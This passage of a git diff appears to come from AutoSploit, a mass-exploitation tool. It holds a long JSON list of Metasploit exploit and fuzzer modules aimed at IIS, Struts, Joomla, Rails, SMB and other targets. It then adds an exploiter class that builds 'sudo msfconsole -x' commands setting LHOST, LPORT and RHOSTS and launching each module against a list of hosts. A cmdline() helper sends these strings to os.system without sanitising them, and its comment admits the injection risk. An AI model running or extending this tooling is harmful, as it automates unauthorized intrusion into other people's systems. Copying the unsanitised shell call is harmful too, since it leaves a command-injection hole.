auxiliary/sqli/oracle/jvm_os_code_10g;exploit -j;", - "use auxiliary/sqli/oracle/jvm_os_code_11g;exploit -j;", - "use auxiliary/fuzzers/dns/dns_fuzzer;exploit -j;", - "use auxiliary/fuzzers/ftp/client_ftp;exploit -j;", - "use auxiliary/fuzzers/ftp/ftp_pre_post;exploit -j;", - "use auxiliary/fuzzers/http/http_form_field;exploit -j;", - "use auxiliary/fuzzers/http/http_get_uri_long;exploit -j;", - "use auxiliary/fuzzers/http/http_get_uri_strings;exploit -j;", - "use auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit -j;", - "use auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit -j;", - "use auxiliary/fuzzers/smb/smb_create_pipe;exploit -j;", - "use auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit -j;", - "use auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit -j; ", - "use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit -j;", - "use auxiliary/fuzzers/smb/smb_tree_connect;exploit -j;", - "use auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit -j;", - "use auxiliary/fuzzers/smtp/smtp_fuzzer;exploit -j;", - "use auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit -j;", - "use auxiliary/fuzzers/ssh/ssh_version_15;exploit -j;", - "use auxiliary/fuzzers/ssh/ssh_version_2;exploit -j;", - "use auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit -j;", - "use auxiliary/fuzzers/tds/tds_login_corrupt;exploit -j;", - "use auxiliary/fuzzers/tds/tds_login_username;exploit -j;" + "exploit/windows/firewall/blackice_pam_icq; exploit", + "exploit/windows/ftp/ms09_053_ftpd_nlst;exploit", + "exploit/windows/http/amlibweb_webquerydll_app;exploit", + "exploit/windows/http/ektron_xslt_exec_ws;exploit", + "exploit/windows/http/umbraco_upload_aspx;exploit", + "exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit", + "exploit/windows/iis/iis_webdav_upload_asp;exploit", + "exploit/windows/iis/ms01_023_printer;exploit", + "exploit/windows/iis/ms01_026_dbldecode;exploit", + "exploit/windows/iis/ms01_033_idq;exploit", + "exploit/windows/iis/ms02_018_htr;exploit", + "exploit/windows/iis/ms02_065_msadc;exploit", + "exploit/windows/iis/ms03_007_ntdll_webdav;exploit", + "exploit/windows/iis/msadc;exploit", + "exploit/windows/isapi/ms00_094_pbserver;exploit", + "exploit/windows/isapi/ms03_022_nsiislog_post;exploit", + "exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit", + "exploit/windows/isapi/rsa_webagent_redirect;exploit", + "exploit/windows/isapi/w3who_query;exploit", + "exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit", + "exploit/windows/ssl/ms04_011_pct;exploit", + "exploit/freebsd/http/watchguard_cmd_exec;exploit ", + "exploit/linux/http/alienvault_exec;exploit ", + "exploit/linux/http/alienvault_sqli_exec;exploit ", + "exploit/linux/http/astium_sqli_upload;exploit ", + "exploit/linux/http/centreon_sqli_exec;exploit ", + "exploit/linux/http/centreon_useralias_exec;exploit ", + "exploit/linux/http/crypttech_cryptolog_login_exec;exploit ", + "exploit/linux/http/dolibarr_cmd_exec;exploit ", + "exploit/linux/http/goautodial_3_rce_command_injection;exploit", + "exploit/linux/http/kloxo_sqli;exploit ", + "exploit/linux/http/nagios_xi_chained_rce;exploit ", + "exploit/linux/http/netgear_wnr2000_rce;exploit ", + "exploit/linux/http/pandora_fms_sqli;exploit ", + "exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit ", + "exploit/linux/http/wd_mycloud_multiupload_upload;exploit ", + "exploit/linux/http/zabbix_sqli;exploit ", + "exploit/linux/misc/qnap_transcode_server;exploit ", + "exploit/linux/mysql/mysql_yassl_getname;exploit ", + "exploit/linux/mysql/mysql_yassl_hello;exploit ", + "exploit/linux/postgres/postgres_payload;exploit ", + "exploit/linux/samba/is_known_pipename;exploit ", + "exploit/multi/browser/java_jre17_driver_manager;exploit ", + "exploit/multi/http/atutor_sqli;exploit ", + "exploit/multi/http/dexter_casinoloader_exec;exploit ", + "exploit/multi/http/drupal_drupageddon;exploit ", + "exploit/multi/http/manage_engine_dc_pmp_sqli;exploit ", + "exploit/multi/http/manageengine_search_sqli;exploit ", + "exploit/multi/http/movabletype_upgrade_exec;exploit ", + "exploit/multi/http/php_volunteer_upload_exe;exploit ", + "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit ", + "exploit/multi/http/splunk_mappy_exec;exploit ", + "exploit/multi/http/testlink_upload_exec;exploit ", + "exploit/multi/http/zpanel_information_disclosure_rce;exploit ", + "exploit/multi/misc/legend_bot_exec;exploit ", + "exploit/multi/mysql/mysql_udf_payload;exploit ", + "exploit/multi/postgres/postgres_createlang;exploit ", + "exploit/solaris/sunrpc/ypupdated_exec;exploit ", + "exploit/unix/ftp/proftpd_133c_backdoor;exploit ", + "exploit/unix/http/tnftp_savefile;exploit ", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit ", + "exploit/unix/webapp/kimai_sqli;exploit ", + "exploit/unix/webapp/openemr_sqli_privesc_upload;exploit ", + "exploit/unix/webapp/seportal_sqli_exec;exploit ", + "exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit ", + "exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit", + "exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit ", + "exploit/windows/http/apache_mod_rewrite_ldap;exploit ", + "exploit/windows/http/ca_totaldefense_regeneratereports;exploit", + "exploit/windows/http/cyclope_ess_sqli;exploit", + "exploit/windows/http/hp_mpa_job_acct;exploit", + "exploit/windows/http/solarwinds_storage_manager_sql;exploit", + "exploit/windows/http/sonicwall_scrutinizer_sql;exploit", + "exploit/windows/misc/altiris_ds_sqli;exploit ", + "exploit/windows/misc/fb_cnct_group;exploit ", + "exploit/windows/misc/lianja_db_net;exploit ", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit ", + "exploit/windows/mssql/lyris_listmanager_weak_pass;exploit ", + "exploit/windows/mssql/ms02_039_slammer;exploit ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit ", + "exploit/windows/mssql/mssql_linkcrawler;exploit ", + "exploit/windows/mssql/mssql_payload;exploit ", + "exploit/windows/mssql/mssql_payload_sqli;exploit ", + "exploit/windows/mysql/mysql_mof;exploit ", + "exploit/windows/mysql/mysql_start_up;exploit ", + "exploit/windows/mysql/mysql_yassl_hello;exploit", + "exploit/windows/mysql/scrutinizer_upload_exec;exploit ", + "exploit/windows/postgres/postgres_payload;exploit ", + "exploit/windows/scada/realwin_on_fcs_login;exploit", + "exploit/multi/http/rails_actionpack_inline_exec;exploit", + "exploit/multi/http/rails_dynamic_render_code_exec;exploit", + "exploit/multi/http/rails_json_yaml_code_exec;exploit", + "exploit/multi/http/rails_secret_deserialization;exploit", + "exploit/multi/http/rails_web_console_v2_code_exec;exploit", + "exploit/multi/http/rails_xml_yaml_code_exec;exploit", + "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", + "exploit/multi/http/phpmoadmin_exec;exploit", + "exploit/multi/http/phpmyadmin_3522_backdoor;exploit", + "exploit/multi/http/phpmyadmin_preg_replace;exploit", + "exploit/multi/http/phpscheduleit_start_date;exploit", + "exploit/multi/http/phptax_exec;exploit", + "exploit/multi/http/phpwiki_ploticus_exec;exploit", + "exploit/multi/http/plone_popen2;exploit", + "exploit/multi/http/pmwiki_pagelist;exploit", + "exploit/multi/http/joomla_http_header_rce;exploit", + "exploit/multi/http/novell_servicedesk_rce;exploit", + "exploit/multi/http/oracle_reports_rce;exploit", + "exploit/multi/http/php_utility_belt_rce;exploit", + "exploit/multi/http/phpfilemanager_rce;exploit", + "exploit/multi/http/processmaker_exec;exploit", + "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", + "exploit/multi/http/spree_search_exec;exploit", + "exploit/multi/http/spree_searchlogic_exec;exploit", + "exploit/multi/http/struts_code_exec_parameters;exploit", + "exploit/multi/http/vtiger_install_rce;exploit", + "exploit/multi/http/werkzeug_debug_rce;exploit", + "exploit/multi/http/zemra_panel_rce;exploit", + "exploit/multi/http/zpanel_information_disclosure_rce;exploit", + "exploit/multi/http/joomla_http_header_rce;exploit", + "exploit/unix/webapp/joomla_akeeba_unserialize;exploit", + "exploit/unix/webapp/joomla_comjce_imgmanager;exploit", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit", + "exploit/unix/webapp/joomla_media_upload_exec;exploit", + "exploit/multi/http/builderengine_upload_exec;exploit", + "exploit/multi/http/caidao_php_backdoor_exec;exploit", + "exploit/multi/http/atutor_sqli;exploit ", + "exploit/multi/http/ajaxplorer_checkinstall_exec;exploit", + "exploit/multi/http/apache_activemq_upload_jsp;exploit -", + "exploit/unix/webapp/wp_lastpost_exec;exploit -", + "exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit", + "exploit/multi/http/axis2_deployer;exploit", + "exploit/unix/webapp/wp_foxypress_upload;exploit", + "exploit/linux/http/tr064_ntpserver_cmdinject;exploit", + "exploit/linux/misc/quest_pmmasterd_bof;exploit", + "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit", + "exploit/unix/webapp/php_xmlrpc_eval;exploit", + "exploit/unix/webapp/wp_admin_shell_upload;exploit", + "exploit/linux/http/sophos_wpa_sblistpack_exec;exploit", + "exploit/linux/local/sophos_wpa_clear_keys;exploit", + "exploit/multi/http/zpanel_information_disclosure_rce;exploit", + "auxiliary/admin/cisco/cisco_asa_extrabacon;exploit", + "auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit", + "auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit", + "exploit/bsdi/softcart/mercantec_softcart;exploit ", + "exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit", + "exploit/freebsd/samba/trans2open;exploit", + "exploit/linux/ftp/proftp_sreplace;exploit ", + "exploit/linux/http/dcos_marathon;exploit", + "exploit/linux/http/f5_icall_cmd;exploit", + "exploit/linux/http/fritzbox_echo_exec;exploit", + "exploit/linux/http/gitlist_exec;exploit", + "exploit/linux/http/goautodial_3_rce_command_injection;exploit", + "exploit/linux/http/ipfire_bashbug_exec;exploit", + "exploit/linux/http/ipfire_oinkcode_exec;exploit", + "exploit/linux/http/ipfire_proxy_exec;exploit", + "exploit/linux/http/kaltura_unserialize_rce;exploit", + "exploit/linux/http/lifesize_uvc_ping_rce;exploit", + "exploit/linux/http/nagios_xi_chained_rce;exploit", + "exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit", + "exploit/linux/http/netgear_wnr2000_rce ;exploit", + "exploit/linux/http/nuuo_nvrmini_auth_rce;exploit", + "exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit", + "exploit/linux/http/op5_config_exec;exploit", + "exploit/linux/http/pandora_fms_exec;exploit", + "exploit/linux/http/pineapple_preconfig_cmdinject;exploit", + "exploit/linux/http/seagate_nas_php_exec_noauth;exploit", + "exploit/linux/http/symantec_messaging_gateway_exec;exploit", + "exploit/linux/http/trendmicro_imsva_widget_exec;exploit", + "exploit/linux/http/trueonline_billion_5200w_rce;exploit", + "exploit/linux/http/trueonline_p660hn_v1_rce;exploit", + "exploit/linux/http/trueonline_p660hn_v2_rce;exploit", + "exploit/linux/http/vcms_upload;exploit", + "exploit/linux/misc/lprng_format_string;exploit", + "exploit/linux/misc/mongod_native_helper;exploit", + "exploit/linux/misc/ueb9_bpserverd;exploit", + "exploit/linux/mysql/mysql_yassl_getname;exploit", + "exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit", + "exploit/linux/postgres/postgres_payload;exploit", + "exploit/linux/pptp/poptop_negative_read;exploit", + "exploit/linux/proxy/squid_ntlm_authenticate;exploit", + "exploit/linux/samba/lsa_transnames_heap;exploit", + "exploit/linux/samba/setinfopolicy_heap;exploit", + "exploit/linux/samba/trans2open;exploit", + "exploit/multi/elasticsearch/script_mvel_rce;exploit", + "exploit/multi/elasticsearch/search_groovy_script;exploit", + "exploit/multi/http/atutor_sqli;exploit", + "exploit/multi/http/axis2_deployer;exploit", + "exploit/multi/http/familycms_less_exe;exploit", + "exploit/multi/http/freenas_exec_raw;exploit", + "exploit/multi/http/gestioip_exec;exploit", + "exploit/multi/http/glassfish_deployer;exploit", + "exploit/multi/http/glpi_install_rce;exploit", + "exploit/multi/http/joomla_http_header_rce;exploit ", + "exploit/multi/http/makoserver_cmd_exec;exploit", + "exploit/multi/http/novell_servicedesk_rc;exploit", + "exploit/multi/http/oracle_reports_rce;exploit", + "exploit/multi/http/php_utility_belt_rce;exploit", + "exploit/multi/http/phpfilemanager_rce;exploit", + "exploit/multi/http/phpmyadmin_3522_backdoor;exploit", + "exploit/multi/http/phpwiki_ploticus_exec;exploit", + "exploit/multi/http/processmaker_exec;exploit", + "exploit/multi/http/rails_actionpack_inline_exec;exploit", + "exploit/multi/http/rails_dynamic_render_code_exec;exploit", + "exploit/multi/http/rails_secret_deserialization;exploit", + "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", + "exploit/multi/http/simple_backdoors_exec;exploit", + "exploit/multi/http/spree_search_exec;exploit", + "exploit/multi/http/spree_searchlogic_exec;exploit", + "exploit/multi/http/struts2_rest_xstream;exploit", + "exploit/multi/http/struts_code_exec;exploit", + "exploit/multi/http/struts_code_exec_classloader;exploit", + "exploit/multi/http/struts_code_exec_parameters;exploit", + "exploit/multi/http/struts_dev_mode;exploit", + "exploit/multi/http/sysaid_auth_file_upload;exploit", + "exploit/multi/http/tomcat_jsp_upload_bypass;exploit", + "exploit/multi/http/vtiger_install_rce;exploit", + "exploit/multi/http/werkzeug_debug_rce;exploit", + "exploit/multi/http/zemra_panel_rce;exploit", + "exploit/multi/http/zpanel_information_disclosure_rce;exploit", + "exploit/multi/ids/snort_dce_rpc;exploit", + "exploit/multi/misc/batik_svg_java;exploit", + "exploit/multi/misc/pbot_exec;exploit", + "exploit/multi/misc/veritas_netbackup_cmdexec;exploit", + "exploit/multi/mysql/mysql_udf_payload;exploit", + "exploit/multi/php/php_unserialize_zval_cookie;exploit", + "exploit/unix/http/freepbx_callmenum;exploit", + "exploit/unix/http/lifesize_room;exploit", + "exploit/unix/http/pfsense_clickjacking;exploit", + "exploit/unix/http/pfsense_group_member_exec;exploit", + "exploit/unix/http/tnftp_savefile;exploit", + "exploit/unix/misc/polycom_hdx_traceroute_exec;exploit", + "exploit/unix/webapp/awstats_migrate_exec;exploit", + "exploit/unix/webapp/carberp_backdoor_exec;exploit", + "exploit/unix/webapp/citrix_access_gateway_exec;exploit", + "exploit/unix/webapp/dogfood_spell_exec;exploit", + "exploit/unix/webapp/invision_pboard_unserialize_exec;exploit", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit", + "exploit/unix/webapp/mybb_backdoor;exploit", + "exploit/unix/webapp/opensis_modname_exec;exploit", + "exploit/unix/webapp/oscommerce_filemanager;exploit", + "exploit/unix/webapp/piwik_superuser_plugin_upload;exploit", + "exploit/unix/webapp/tikiwiki_upload_exec;exploit", + "exploit/unix/webapp/webtester_exec;exploit", + "exploit/unix/webapp/wp_phpmailer_host_header;exploit", + "exploit/unix/webapp/wp_total_cache_exec;exploit", + "exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit", + "exploit/windows/http/ektron_xslt_exec;exploit", + "exploit/windows/http/ektron_xslt_exec_ws;exploit", + "exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit", + "exploit/windows/http/hp_autopass_license_traversal;exploit", + "exploit/windows/http/manage_engine_opmanager_rce;exploit", + "exploit/windows/http/netgear_nms_rce;exploit", + "exploit/windows/http/sepm_auth_bypass_rce;exploit", + "exploit/windows/http/trendmicro_officescan_widget_exec;exploit", + "exploit/windows/iis/iis_webdav_upload_asp;exploit", + "exploit/windows/iis/msadc;exploit", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit", + "exploit/windows/novell/file_reporter_fsfui_upload;exploit", + "exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit", + "exploit/windows/smb/ipass_pipe_exec;exploit", + "exploit/windows/smb/smb_relay;exploit", + "auxiliary/sqli/oracle/jvm_os_code_10g;exploit", + "auxiliary/sqli/oracle/jvm_os_code_11g;exploit", + "auxiliary/fuzzers/dns/dns_fuzzer;exploit", + "auxiliary/fuzzers/ftp/client_ftp;exploit", + "auxiliary/fuzzers/ftp/ftp_pre_post;exploit", + "auxiliary/fuzzers/http/http_form_field;exploit", + "auxiliary/fuzzers/http/http_get_uri_long;exploit", + "auxiliary/fuzzers/http/http_get_uri_strings;exploit", + "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit", + "auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit", + "auxiliary/fuzzers/smb/smb_create_pipe;exploit", + "auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit", + "auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit ", + "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit", + "auxiliary/fuzzers/smb/smb_tree_connect;exploit", + "auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit", + "auxiliary/fuzzers/smtp/smtp_fuzzer;exploit", + "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit", + "auxiliary/fuzzers/ssh/ssh_version_15;exploit", + "auxiliary/fuzzers/ssh/ssh_version_2;exploit", + "auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit", + "auxiliary/fuzzers/tds/tds_login_corrupt;exploit", + "auxiliary/fuzzers/tds/tds_login_username;exploit" ] } diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py index f244945..2ab836f 100644 --- a/lib/cmdline/cmd.py +++ b/lib/cmdline/cmd.py @@ -25,6 +25,10 @@ def optparser(): help="provide a text file to convert into JSON and save for later use") parser.add_argument("-E", "--exploit", metavar="EXPLOIT", dest="singleExploit", help="pass a single exploit in the same format as the JSON file(s)") + parser.add_argument("--ruby-exec", action="store_true", dest="rubyExecutableNeeded", + help="if you need to run the Ruby executable with MSF use this") + parser.add_argument("--msf-path", metavar="MSF-PATH", dest="pathToFramework", + help="pass the path to your framework if it is not in your ENV PATH") parser.add_argument("--ethics", action="store_true", dest="displayEthics", help=argparse.SUPPRESS) # easter egg! opts = parser.parse_args() diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index e69de29..a461aae 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py @@ -0,0 +1,42 @@ +import lib.settings +import lib.output + + +class AutoSploitExploiter(object): + + sorted_modules = [] + + def __init__(self, hosts, configuration, all_modules, **kwargs): + self.hosts = hosts + self.configuration = configuration + self.mods = all_modules + self.query = kwargs.get("query", lib.settings.QUERY_FILE_PATH) + self.query_file = open(self.query).read() + self.single = kwargs.get("single", None) + self.ruby_exec = kwargs.get("ruby_exec", False) + self.msf_path = kwargs.get("msf_path", None) + + def view_sorted(self): + for mod in self.sorted_modules[0]: + print(mod) + + def sort_modules_by_query(self): + for mod in self.mods: + if self.query_file.strip() in mod: + self.sorted_modules.append(mod) + return self.sorted_modules + + def start_exploit(self, mods, hosts): + template = ( + "sudo {} {} -x 'workspace -a {}; " + "setg LHOST {}; setg LPORT {}; setg VERBOSE " + "true; setg THREADS 100; set RHOSTS {}; use {} -j;'" + ) + for mod, host in zip(mods, hosts): + template = template.format( + "ruby" if self.ruby_exec else "", + self.msf_path if self.msf_path is not None else "msfconsole", + self.configuration[0], self.configuration[1], self.configuration[2], + host.strip(), mod.strip() + ) + lib.settings.cmdline(template) diff --git a/lib/settings.py b/lib/settings.py index 39f960d..487fc9b 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -1,16 +1,22 @@ import os +import sys +import time import socket import getpass +import tempfile +import subprocess import psutil import lib.output -import api_calls +import lib.banner HOST_FILE = "{}/hosts.txt".format(os.getcwd()) +USAGE_AND_LEGAL_PATH = "{}/etc/text_files/general".format(os.getcwd()) START_POSTGRESQL_PATH = "{}/etc/scripts/start_postgre.sh".format(os.getcwd()) START_APACHE_PATH = "{}/etc/scripts/start_apache.sh".format(os.getcwd()) +QUERY_FILE_PATH = tempfile.NamedTemporaryFile(delete=False).name PLATFORM_PROMPT = "\n{}@\033[36mPLATFORM\033[0m$ ".format(getpass.getuser()) AUTOSPLOIT_PROMPT = "\n\033[31m{}\033[0m@\033[36mautosploit\033[0m# ".format(getpass.getuser()) API_KEYS = { @@ -31,15 +37,21 @@ 99: "quit" } +stop_animation = False + def validate_ip_addr(provided): """ validate an IP address to see if it is real or not """ - try: - socket.inet_aton(provided) - return True - except: + not_acceptable = ("0.0.0.0", "127.0.0.1", "255.255.255.255") + if provided not in not_acceptable: + try: + socket.inet_aton(provided) + return True + except: + return False + else: return False @@ -109,4 +121,61 @@ def makedir(dir): "censys": (open(API_KEYS["censys"][0]).read(), open(API_KEYS["censys"][1]).read()), "shodan": (open(API_KEYS["shodan"][0]).read(), ) } - return api_tokens \ No newline at end of file + return api_tokens + + +def cmdline(command): + """ + Function that allows us to store system command output in a variable. + We'll change this later in order to solve the potential security + risk that arises when passing untrusted input to the shell. + + I intend to have the issue resolved by Version 1.5.0. + """ + + os.system(command) + '''process = subprocess.call( + args=" ".join(command), + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + shell=True + ) + return process''' + + +def check_for_msf(): + in_env = os.getenv("msfconsole", False) + if not in_env: + return False + + +def logo(): + """ + display a random banner from the banner.py file + """ + print(lib.banner.banner_main()) + + +def animation(text): + """ + display an animation while working, this will be + single threaded so that it will not screw with the + current running process + """ + # TODO:/ this will not stop when stop animation is True + global stop_animation + i = 0 + while not stop_animation: + if stop_animation is True: + print("\n") + temp_text = list(text) + if i >= len(temp_text): + i = 0 + temp_text[i] = temp_text[i].upper() + temp_text = ''.join(temp_text) + sys.stdout.write("\033[96m\033[1m{}...\r\033[0m".format(temp_text)) + sys.stdout.flush() + i += 1 + time.sleep(0.1) + else: + print("\n") \ No newline at end of file